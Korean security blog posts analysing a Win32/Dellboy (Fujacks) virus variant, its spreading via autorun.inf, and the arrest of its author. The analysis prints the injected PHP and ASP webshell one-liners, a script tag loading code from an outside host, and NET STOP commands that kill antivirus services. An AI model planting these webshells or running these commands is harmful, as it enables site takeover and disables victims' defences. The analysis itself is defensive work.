Win32/Dellboy 바이러스 제작자는 검거 되었지만 변형은 계속 등장하고 있다.

MD5 : 5af7352bc0bd0e356aa1b408aee042c7
파일길이 : 53760

이번 변형은 바이러스 기능은 아직 찾지 못했다.

실행되면 각 드라이브에 autorun.inf 와 RECYCLER.EXE 생성한다.
플로피 디스크가 있는 시스템의 경우 플로피 디스크가 삽입되어 있지 않으면 에러가 발생 한다.

 No disk
 
 There is no disk in the drive, Please insert a disk into drive A:

사용자 삽입 이미지

플로피 디스크 드라이브에 플로피 디스크가 없을 때


이는 제작자가 모든 폴더에 RECYCLER.EXE와 AUTORUN.INF 파일을 생성하는데 미처 플로피 디스크인건 확인하지 않았기 때문이다.

시스템에서 확장자가 HTML, SHTML, ASPX 인 파일을 찾아 다음 스크립트를 삽입한다. 테스트 당시 해당 주소에는 접속되지 않았다.

<?php @eval($_POST[jokeyouphp])?>                                                                      
<script language="javascript" src="http://htmlcss.3322.org/sub/ray.js"></script
<%execute request("jokeyou")&""%>                                                                      
<script language="javascript" src="http://htmlcss.3322.org/sub/ray.js"></script>                       
<script language="javascript" src="http://htmlcss.3322.org/sub/ray.js"></script>                       

시스템에는 ntion.exe 와 ntion.dll 파일을 생성한다.

여러 보안 프로그램을 강제 종료한다.

NET STOP MonSvcNT    
NET STOP OfficeScanNT Monitor
NET STOP Norton              
NET STOP ZoneAlarm           
NET stop McShield            
NET stop V3MonSvc               ---> V3
NET stop MskService          
NET stop McTaskManager       
NET stop Symantec Core LC    
NET stop kavsvc              
NET stop spidernt            

다음 프로그램 (주로 보안 프로그램 밑 시스템 툴)

VCRMON.EXE           
KAV.EXE              
CCAPP.EXE            
NVSVC32.EXE          
SPIDERUI.EXE         
UPGRADE.EXE          
SPIDERNT.EXE         
MONSVCNT.EXE         
MONSYSNT.EXE       --> V3
TRIALREG.EXE         
SUPDATE.EXE          --> V3
AUTORUNS.EXE         
ICESWORD.EXE         
MCSHIELD.EXE         
REGEDIT.EXE          
MSCONFIG.EXE          

물론 고스트(Ghost) 이미지 파일인 확장자가 GHO 인 파일도 삭제한다.
       
Posted by mstoned7

댓글을 달아 주세요

Win32/Dellboy(W32/Fujacks, Whboy, 판다 바이러스) 바이러스 제작자와 이 바이러스를 배포한 중국인이 검거되었다고 한다.

다음은 안랩에서 중국어가 가능한 분이 요약한 내용이다.

-------------------------

호북성 무한시(WuHan)의 리준(25세)가 제작자이며 리준은  2006년 10월 16일 현재 이 바이러스를 120 여명에게 팔아 1200 만원을 챙겼다고 한다.

검거된 나머지 5명은 코드를 수정해 배포했다고 한다.

자기가 제작자라고 거짓말한 사람이 있는데 이 사람의 회사는 현재 주기적으로 저녁 8시-12시 사이에 해커들의 공격을 받고 있다고 한다.

----------------------------------

120여명에게 팔았으므로 제작자가 잡혔다고해서 Dellboy 바이러스가 종적을 감추기는 어려울 듯 싶다.

[기사]

http://news.xinhuanet.com/legal/2007-02/12/content_5731540.htm (중국어)

http://www.avertlabs.com/research/blog/?p=200 
(W32/Fujacks: Panda Malware Breeders Arrested)

http://it.rising.com.cn/Channels/Info/Securty/2007-02-13/1171334985d40534.shtml

Posted by mstoned7

댓글을 달아 주세요


사용자 삽입 이미지


황금돼지가 우리나라의 상술은 아니었나보다.
- 황금돼지띠라는건 없다고 한다.

중국산 Win32/Dellboy 바이러스에서도 황금돼지 아이콘이 사용되었다

Posted by mstoned7
TAG Dellboy

댓글을 달아 주세요